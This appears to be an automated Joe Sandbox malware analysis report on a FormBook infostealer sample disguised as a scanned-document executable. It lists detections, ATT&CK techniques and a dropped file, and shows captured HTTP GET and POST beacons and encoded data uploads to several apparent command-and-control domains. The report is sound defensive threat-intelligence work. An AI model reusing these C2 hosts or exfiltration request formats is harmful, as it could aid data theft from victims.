
Analysis Report SKMBT 25032020 Ref- 0000019.exe

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli
Analysis ID: 218312
Start date: 26.03.2020
Start time: 18:56:29
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 19m 14s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SKMBT 25032020 Ref- 0000019.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@25/21@41/7
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 50.3% (good quality ratio 47.3%)
  • Quality average: 70.5%
  • Quality standard deviation: 31%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 201
  • Number of non-executed functions: 272
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 92.122.156.202, 205.185.216.10, 205.185.216.42, 93.184.221.240, 2.20.143.16, 2.20.143.23
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Execution Graph export aborted for target Cookies7n1p8js.exe, PID 5456 because it is empty
  • Execution Graph export aborted for target SKMBT 25032020 Ref- 0000019.exe, PID 4864 because it is empty
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy | Score | Range | Reporting | Whitelisted | Threat | Detection
Threshold | 100 | 0 - 100 | | false | FormBook | malicious

Confidence

Strategy | Score | Range | Further Analysis Required? | Confidence
Threshold | 5 | 0 - 5 | false |


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons; additional UI automation may extend the observed behavior.
Sample monitors window changes (e.g. starting applications); analyze the sample with the 'Simulates keyboard and window changes' cookbook.
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior.



MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Execution through API 1 | Registry Run Keys / Startup Folder 1 | Process Injection 712 | Software Packing 23 | Credential Dumping 1 | Security Software Discovery 121 | Remote File Copy 3 | Man in the Browser 1 | Data Encrypted 1 | Remote File Copy 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Replication Through Removable Media | Execution through Module Load 1 | Port Monitors | Accessibility Features | Disabling Security Tools 1 | Network Sniffing | File and Directory Discovery 3 | Remote Services | Data from Local System 1 | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
External Remote Services | Exploitation for Client Execution 1 | Accessibility Features | Path Interception | Deobfuscate/Decode Files or Information 1 | Input Capture | System Information Discovery 13 | Windows Remote Management | Email Collection 1 | Automated Exfiltration | Standard Non-Application Layer Protocol 4 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Drive-by Compromise | Graphical User Interface 1 | System Firmware | DLL Search Order Hijacking | Obfuscated Files or Information 4 | Credentials in Files | Virtualization/Sandbox Evasion 3 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 14 | SIM Card Swap | Premium SMS Toll Fraud |
Exploit Public-Facing Application | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Masquerading 1 | Account Manipulation | Process Discovery 2 | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Spearphishing Link | Graphical User Interface | Modify Existing Service | New Service | Virtualization/Sandbox Evasion 3 | Brute Force | Application Window Discovery 1 | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port | Jamming or Denial of Service | Abuse Accessibility Features |
Spearphishing Attachment | Scripting | Path Interception | Scheduled Task | Process Injection 712 | Two-Factor Authentication Interception | Remote System Discovery 1 | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |

Signature Overview



AV Detection:

Multi AV Scanner detection for domain / URL
Source: www.msdcong.com, Virustotal: Detection: 7%
Source: http://www.msdcong.com/pg/, Virustotal: Detection: 7%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Uchul\Cookies7n1p8js.exe, Virustotal: Detection: 24%
Multi AV Scanner detection for submitted file
Source: SKMBT 25032020 Ref- 0000019.exe, Virustotal: Detection: 24%
Yara detected FormBook
Source: Yara match, File source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match, File source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked file
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack, Avira: Label: TR/Dropper.Gen
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen

Spreading:

Enumerates the file system
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe, Code function: 4x nop then pop edi, 5_2_00414068
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe, Code function: 4x nop then pop edi, 5_2_0041511F
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe, Code function: 4x nop then pop ebx, 5_2_0040546C
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe, Code function: 4x nop then pop edi, 21_2_00414068
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe, Code function: 4x nop then pop edi, 21_2_0041511F
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe, Code function: 4x nop then pop ebx, 21_2_0040546C

Networking:

HTTP GET or POST without a user agent
Source: global traffic, HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1 | Host: www.alwaysbucheon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /pg/?cl=bp3gRoXoP4yEgK1sgJSYJfU+FssScB904rbINqXJ/OBc+k4pi0Qt4zKRKRSxUz2ykIhM&2drl7=sL04ivN0C HTTP/1.1 | Host: www.frengeen.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /pg/?cl=RA/4Irk5P4f6SUywnqVLcdKqFQC5UyywDrBVn7AQH3o0gkoTjo44CDVTLwAwj/6QVTo4&2drl7=sL04ivN0C HTTP/1.1 | Host: www.aalldxea.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /pg/?cl=9HTETHSv3BkodYmkolV6gIdBk+nR/n7VQF8IV1eTi9ORfvNnIi0cIKnqFVKcp7KNM91B&2drl7=sL04ivN0C HTTP/1.1 | Host: www.msdcong.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /pg/?cl=Iu7OK7c719yg5+rObwJSE42h0tf2fXC4Qmo10pi2UhOWitvONWxHvB/i0oS+D3HNIxcl&2drl7=sL04ivN0C HTTP/1.1 | Host: www.wshlzhx.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /pg/?cl=5lvF9aNASzw0/ednaHrHq3bCrY2s26KKXO6afqfWx34cy2T8YgpekM9WcQWNtwYcYtQM&2drl7=sL04ivN0C HTTP/1.1 | Host: www.zcn4.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic, HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1 | Host: www.alwaysbucheon.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View, IP Address: 91.195.240.94
Internet Provider seen in connection with other malware
Source: Joe Sandbox View, ASN Name: unknown
Source: Joe Sandbox View, ASN Name: unknown
Source: Joe Sandbox View, ASN Name: unknown
Source: Joe Sandbox View, ASN Name: unknown
Uses a known web browser user agent for HTTP communication
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 50 57 30 65 64 37 38 33 61 70 2d 6b 65 76 75 62 72 6f 67 52 39 4d 46 4b 51 35 6d 69 73 75 4d 5a 72 69 52 33 65 35 6d 28 51 77 49 6c 33 68 6f 77 30 4c 56 63 69 69 31 58 41 47 49 79 34 67 6e 75 45 4b 44 36 4c 4c 4e 6d 41 33 41 58 62 6c 45 4c 57 6c 45 75 61 7e 5f 79 31 4a 32 32 43 7e 33 4d 53 41 7a 41 38 50 47 36 41 36 41 72 54 56 49 33 68 6f 55 57 4b 6c 6c 51 6d 51 65 76 5a 4c 54 38 70 6b 35 4c 35 43 72 66 70 71 69 46 73 6b 58 35 64 58 47 6d 37 74 55 6a 42 66 58 61 31 6c 66 37 78 67 79 78 56 77 54 4c 71 50 75 5a 45 78 41 4e 31 48 39 55 75 36 51 53 5a 43 4e 5a 7a 52 62 6d 37 41 50 77 55 67 33 7e 71 6d 61 32 5a 6c 6c 42 72 55 63 38 44 71 77 4d 6f 39 59 6b 42 58 42 69 5a 63 61 55 37 59 55 28 63 53 39 55 77 69 4d 36 78 71 69 78 72 67 59 43 75 38 6f 59 5f 61 79 75 57 67 43 6e 67 36 2d 71 61 76 35 45 4b 54 44 62 5f 47 5a 59 48 42 47 58 73 71 33 78 6b 39 38 34 76 70 71 38 79 6a 6d 51 64 37 46 42 55 36 55 75 58 57 35 49 6f 39 33 65 6d 54 68 38 58 41 5f 65 7a 5a 69 4f 41 76 4e 43 51 35 41 30 47 31 36 76 69 4c 6f 55 6b 45 79 5a 5a 76 70 73 76 56 5a 34 56 76 42 4d 77 54 79 78 54 55 50 51 51 66 4b 71 41 52 30 76 48 73 30 7e 31 49 4f 31 51 73 64 49 36 4d 65 69 5f 47 79 45 6e 79 61 4b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
cl=TL7aPPW0ed783ap-kevubrogR9MFKQ5misuMZriR3e5m(QwIl3how0LVcii1XAGIy4gnuEKD6LLNmA3AXblELWlEua~_y1J22C~3MSAzA8PG6A6ArTVI3hoUWKllQmQevZLT8pk5L5CrfpqiFskX5dXGm7tUjBfXa1lf7xgyxVwTLqPuZExAN1H9Uu6QSZCNZzRbm7APwUg3~qma2ZllBrUc8DqwMo9YkBXBiZcaU7YU(cS9UwiM6xqixrgYCu8oY_ayuWgCng6-qav5EKTDb_GZYHBGXsq3xk984vpq8yjmQd7FBU6UuXW5Io93emTh8XA_ezZiOAvNCQ5A0G16viLoUkEyZZvpsvVZ4VvBMwTyxTUPQQfKqAR0vHs0~1IO1QsdI6Mei_GyEnyaKA).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 4e 32 67 4e 4e 76 70 36 49 52 41 6c 70 50 50 57 61 67 69 54 74 59 52 57 51 42 79 39 76 37 42 5a 6f 4b 4b 73 50 4a 34 34 77 67 49 6a 78 56 76 72 6b 4c 4b 55 43 69 30 54 41 4b 65 78 6f 59 56 75 41 36 70 36 4c 7a 4f 76 69 76 46 58 4c 6c 70 4b 32 70 38 6e 36 36 30 79 32 38 57 6e 6b 6d 5a 4a 54 38 7a 45 4d 58 45 32 42 72 43 69 77 41 49 7e 79 63 56 55 4c 4e 73 51 51 59 32 6f 4c 33 31 78 38 45 37 61 65 7e 67 43 5a 61 4b 43 2d 45 6d 39 4e 79 4f 6a 34 51 51 75 43 4c 54 64 77 52 58 30 53 34 78 7a 68 63 5a 4f 6f 58 41 4a 6d 42 35 42 45 32 47 55 74 71 6d 4b 63 43 63 54 54 39 6c 6b 4b 38 78 7e 42 45 35 67 72 6e 61 6c 4b 64 55 44 72 45 7a 30 69 61 72 62 70 68 4e 6a 48 54 52 73 59 46 73 57 75 6f 75 6e 39 69 56 55 6a 4f 45 31 52 62 41 70 34 41 50 5a 4e 6c 6c 55 63 32 41 6a 57 67 70 68 67 36 36 6c 4b 50 46 52 5a 7e 42 61 75 33 56 5a 41 55 61 41 74 32 32 79 6e 59 44 38 4c 45 63 36 42 6a 63 46 36 65 73 58 56 4f 68 6d 41 7e 4a 56 59 39 51 65 67 75 76 38 58 42 41 65 79 5a 49 4d 31 48 4e 43 45 6c 54 79 68 68 32 70 69 4c 35 57 30 55 30 43 35 54 35 73 76 4e 5a 35 67 4c 72 65 6d 33 79 37 68 4d 4f 51 30 72 4b 72 51 52 30 7a 48 74 48 35 58 49 43 79 46 6f 6c 4c 70 42 34 6d 49 66 2d 41 33 33 4a 66 5a 4e 50 57 7a 38 2d 67 5f 6c 4b 4a 79 42 77 6b 45 4c 75 7e 64 76 4d 56 66 75 6d 30 73 31 79 49 6d 4a 71 30 45 6e 7a 70 4b 64 61 57 43 43 76 55 56 76 43 78 54 6d 7a 33 2d 75 34 7a 56 77 4b 59 50 55 4f 72 78 4e 49 48 41 45 77 72 30 33 68 6d 5f 77 64 38 6f 70 57 59 54 6e 2d 7a 56 43 47 51 65 6f 48 6c 6b 41 67 73 4f 69 6b 74 53 49 44 6c 54 39 46 70 6a 74 4c 43 57 34 
51 79 6b 51 34 32 36 75 4a 45 64 71 7a 6c 43 62 48 63 33 49 55 64 74 75 4a 4a 35 79 44 6d 36 35 69 45 55 33 65 51 6e 52 72 52 78 54 33 79 67 72 66 59 73 51 69 53 4e 67 69 37 54 76 7a 4a 6e 4e 6a 77 6b 35 69 41 70 61 51 39 39 57 42 30 67 65 6a 6e 4b 65 4d 6f 39 63 4e 68 4c 63 42 37 69 41 77 48 62 31 42 30 66 59 45 76 5f 55 46 70 69 59 6a 79 75 6c 59 41 66 43 76 50 61 79 58 53 44 78 75 72 6a 52 75 59 6a 4a 6d 74 58 7a 62 5a 41 6f 44 32 66 37 52 38 61 49 58 33 77 74 67 6e 73 52 44 42 55 4d 58 69 6b 4e 2d 57 70 74 35 35 49 67 4f 64 4b 41 35 33 35 4e 6c 65 6b 47 49 56 33 78 37 56 4a 4e 4a 77 45 6f 35 76 79 41 4e 62 76 55 72 56 37 57 68 48 56 73 30 66 37 68 57 67 70 5a 5a 58 4c 49 7a 44 30 61 34 4b 76 48 53 51 71 7a 32 7a 44 78 6b 77 42 7a 68 35 44 55 77 56 55 38 6c 6d 39 35 4e 70 79 4c 68 78 6b 6e 71 73 68 6e 57 76 6b 69 45 46 42 64 50 59 74 49 58 5a 51 6b 79 51 36 63 78 7a 74 6f 77 76 78 65 51 48 36 4f 64 4f 77 4d 5f 32 4f 73 6a 7a 52 77 37 73 4c 58 37 64 4f 6d 76 47 79 70 34 36 42 72 55 54 4b 47 75 74 41 77 48
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.aalldxea.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.aalldxea.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aalldxea.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 5a 69 7a 43 57 4d 63 78 4e 59 61 5a 46 58 69 78 6a 39 70 54 48 6f 75 71 53 78 53 76 5a 67 4b 4a 66 63 73 66 68 71 30 35 58 55 38 57 74 67 38 2d 71 62 4a 64 4f 33 56 54 57 33 39 48 73 61 7a 35 58 7a 70 44 7a 71 4a 73 45 34 47 34 4d 4e 34 78 4c 47 42 6d 77 43 31 50 47 33 64 62 69 50 38 37 50 51 4f 45 67 42 42 4a 57 39 64 2d 59 46 57 6d 6f 76 4f 30 6b 69 49 4d 6e 61 39 32 70 70 56 48 6b 4e 72 33 73 41 67 77 43 6e 6f 31 30 45 4e 5f 37 70 57 2d 69 42 6f 6c 47 76 47 67 4e 55 78 6d 62 75 41 6f 4c 33 30 45 6f 63 32 46 44 41 5a 52 79 37 4b 72 77 45 63 76 32 49 61 48 28 67 43 62 7a 72 4a 4c 6b 77 76 61 64 41 53 39 42 73 52 72 6d 38 5a 72 79 4e 52 6f 7a 54 38 5a 68 38 75 61 28 35 6f 68 7a 43 6b 4f 45 43 59 51 35 46 48 6b 6d 36 50 57 43 43 62 72 7e 64 39 41 69 73 52 68 47 41 6c 71 4f 77 48 33 48 77 6b 52 41 69 43 4d 51 4e 4e 4e 6f 69 69 57 77 2d 49 63 56 46 73 77 46 42 38 31 55 79 7a 38 5a 62 67 5f 61 51 6e 61 67 75 6e 4c 61 47 50 48 6b 6a 44 31 70 2d 36 6d 77 41 59 51 61 68 50 49 7a 4b 63 32 4c 42 51 49 6f 4f 52 6d 41 6c 45 48 53 34 64 62 79 6b 46 6c 30 57 41 4f 7e 4f 64 5f 75 43 38 6b 4d 6f 33 38 34 6f 56 4e 56 63 31 74 6c 51 57 64 6c 2d 7a 36 4d 62 39 4b 4c 62 41 51 4b 76 57 4c 34 49 46 56 4a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
cl=ZizCWMcxNYaZFXixj9pTHouqSxSvZgKJfcsfhq05XU8Wtg8-qbJdO3VTW39Hsaz5XzpDzqJsE4G4MN4xLGBmwC1PG3dbiP87PQOEgBBJW9d-YFWmovO0kiIMna92ppVHkNr3sAgwCno10EN_7pW-iBolGvGgNUxmbuAoL30Eoc2FDAZRy7KrwEcv2IaH(gCbzrJLkwvadAS9BsRrm8ZryNRozT8Zh8ua(5ohzCkOECYQ5FHkm6PWCCbr~d9AisRhGAlqOwH3HwkRAiCMQNNNoiiWw-IcVFswFB81Uyz8Zbg_aQnagunLaGPHkjD1p-6mwAYQahPIzKc2LBQIoORmAlEHS4dbykFl0WAO~Od_uC8kMo384oVNVc1tlQWdl-z6Mb9KLbAQKvWL4IFVJg).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.aalldxea.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.aalldxea.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aalldxea.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 5a 69 7a 43 57 4e 46 41 4c 2d 47 49 50 46 37 47 69 4b 49 44 66 72 75 6f 42 52 6d 7a 55 54 62 36 57 76 59 50 68 70 63 39 4f 48 30 69 6f 41 73 2d 73 64 39 61 47 33 56 53 51 33 39 41 6f 61 32 4f 49 7a 52 4c 7a 75 78 57 45 34 4f 5f 46 72 30 34 49 57 42 50 77 69 78 5a 45 33 4a 36 69 4e 34 53 65 7a 69 63 32 52 4e 4a 4a 39 46 34 54 48 75 48 68 4b 6d 37 6e 53 55 46 6c 61 56 6a 6f 65 6b 79 6a 65 57 59 6b 68 38 79 47 55 31 35 37 6b 39 62 33 65 71 78 73 78 38 6d 44 6f 4f 7a 49 7a 42 69 4c 37 30 61 45 54 6f 48 32 63 7e 44 54 54 41 73 30 50 53 53 31 55 4d 64 32 4c 36 78 32 32 69 4f 78 59 4e 54 6e 42 54 67 57 52 6e 37 4f 5f 35 6a 69 35 4d 62 7e 75 4a 48 38 32 34 34 79 38 43 44 79 62 42 6b 73 32 41 66 58 44 45 6d 7a 51 6a 59 67 72 62 65 4f 6a 4c 45 6d 75 63 57 74 76 70 35 42 43 70 59 52 41 48 4c 46 77 6b 56 4c 33 7e 6b 56 75 67 44 35 69 54 61 7a 39 5a 59 43 6c 41 4c 43 45 30 4c 4a 48 4f 4b 55 4b 59 6a 55 43 76 75 6d 36 66 41 4e 47 36 36 35 54 44 53 70 34 6e 71 77 41 59 63 61 6c 53 54 7a 2d 55 32 4b 54 59 62 34 39 4a 36 47 6c 45 67 51 49 4e 5a 35 7a 6b 39 30 57 59 4f 34 2d 4d 59 75 78 63 6b 62 4c 65 4f 37 4d 42 4e 55 4d 31 74 38 41 58 52 6b 4d 53 7a 4c 73 34 70 4d 72 42 71 4f 61 7a 6c 36 70 55 67 57 39 72 65 66 42 67 4c 59 54 44 6f 54 76 51 4a 37 55 4d 6d 6c 63 63 57 63 52 4b 73 69 51 43 75 53 63 30 42 43 61 6c 68 4e 73 61 59 51 31 73 54 32 2d 5a 4d 6f 7a 54 76 4b 7a 6c 67 4a 4d 56 6f 37 41 62 62 63 4c 37 65 57 6c 62 56 6a 42 32 46 55 64 6e 36 43 4e 56 4d 30 65 4b 6f 31 39 6e 39 78 4d 4d 65 51 58 73 35 61 31 4c 46 73 4b 4e 47 56 64 46 56 7e 79 33 52 39 79 63 
50 42 76 39 75 7a 4f 58 32 41 35 36 44 6c 6e 4c 59 36 35 76 55 37 38 68 69 4e 6e 32 68 44 44 77 6e 54 77 37 79 4d 63 33 47 5a 69 57 49 46 5f 31 2d 59 6b 48 37 7e 44 74 58 32 30 41 77 37 48 43 63 35 6e 66 68 44 68 62 30 4e 4e 45 72 7a 5f 4a 47 38 64 6a 47 69 45 6c 51 33 34 4f 4d 37 59 4a 57 49 70 4b 46 57 49 49 36 4b 5a 32 34 4c 32 62 57 32 57 74 41 7e 31 68 66 49 67 67 53 43 41 6f 4e 47 74 50 4c 42 36 67 57 79 77 76 46 36 55 35 31 48 74 49 54 62 4d 47 71 54 78 50 50 4b 6e 61 44 30 6a 4f 45 66 46 4d 4a 46 74 28 36 76 67 56 52 7a 37 31 44 6a 4a 57 77 4f 76 61 70 57 6d 31 33 56 67 6d 4e 6c 46 47 49 7e 69 67 55 39 69 56 66 44 55 4c 4e 6f 69 30 39 64 69 6b 34 75 61 51 44 41 71 6c 48 74 77 52 5f 64 6e 59 32 33 5f 73 48 28 65 73 6c 72 73 68 35 6b 4f 54 6c 63 62 68 5f 57 79 73 48 76 30 73 4e 66 46 44 48 77 35 57 6b 28 50 4a 58 54 52 28 55 61 37 31 65 57 68 35 34 45 42 70 58 48 54 70 6d 50 51 4d 62 52 36 78 70 4d 34 66 7a 5a 53 32 2d 65 4a 6a 56 64 75 66 71 59 32 34 37 62 51 7a 66 71 43 30 5f 56 65 46 4d 67 58 6a 36
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.msdcong.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.msdcong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msdcong.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 31 6c 66 2d 4e 6a 6a 74 68 57 46 53 4e 59 32 5f 6b 52 38 57 38 65 6c 33 6a 4f 6e 65 78 6c 43 53 46 51 31 54 49 43 43 53 6d 64 69 49 57 66 68 6a 45 48 6f 4a 41 50 76 73 65 7a 6e 43 67 37 6d 47 52 63 41 62 6a 79 32 42 55 68 46 76 59 66 68 35 63 4c 70 65 71 6d 69 36 69 51 4d 37 50 72 6f 5f 51 44 4f 42 6f 48 6e 67 36 6d 44 34 55 44 7e 6b 38 38 49 55 52 47 52 34 69 4f 4e 78 67 55 36 38 68 52 38 6f 49 57 4e 2d 75 53 6b 66 62 6a 6c 6f 55 33 6f 68 52 39 4b 6e 45 58 6e 38 64 67 79 62 55 53 73 39 70 38 4a 6b 72 37 38 48 42 6d 6f 72 63 59 79 7a 4e 72 34 76 44 5f 69 79 7a 74 72 5a 5a 59 58 4d 57 4c 30 76 4a 2d 75 55 38 34 53 6c 76 4b 63 30 67 37 50 37 4d 4c 4e 73 44 35 34 7a 4f 66 43 67 59 5a 66 62 4b 70 5a 69 68 44 61 4f 32 48 6e 65 53 53 70 4a 52 61 64 58 6a 4a 28 43 73 71 79 62 52 46 58 53 43 51 43 4e 64 47 59 6e 67 36 78 63 4a 6d 56 79 4f 63 32 77 68 6b 66 51 49 31 4e 6e 73 6c 6b 6a 63 69 28 74 64 35 46 4c 34 62 4d 70 79 57 43 64 7a 4c 73 7a 57 65 49 2d 4a 54 6c 71 63 71 37 69 68 49 44 37 6a 54 77 35 77 71 6c 4d 6e 77 50 52 5a 61 79 49 67 45 6b 6c 4a 6f 61 79 43 7a 69 70 73 7a 6c 6c 37 5f 30 57 42 71 51 61 39 70 53 6a 4d 44 79 53 55 39 56 6d 44 67 4d 71 50 56 59 69 42 7a 54 74 55 39 61 45 66 67 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: 
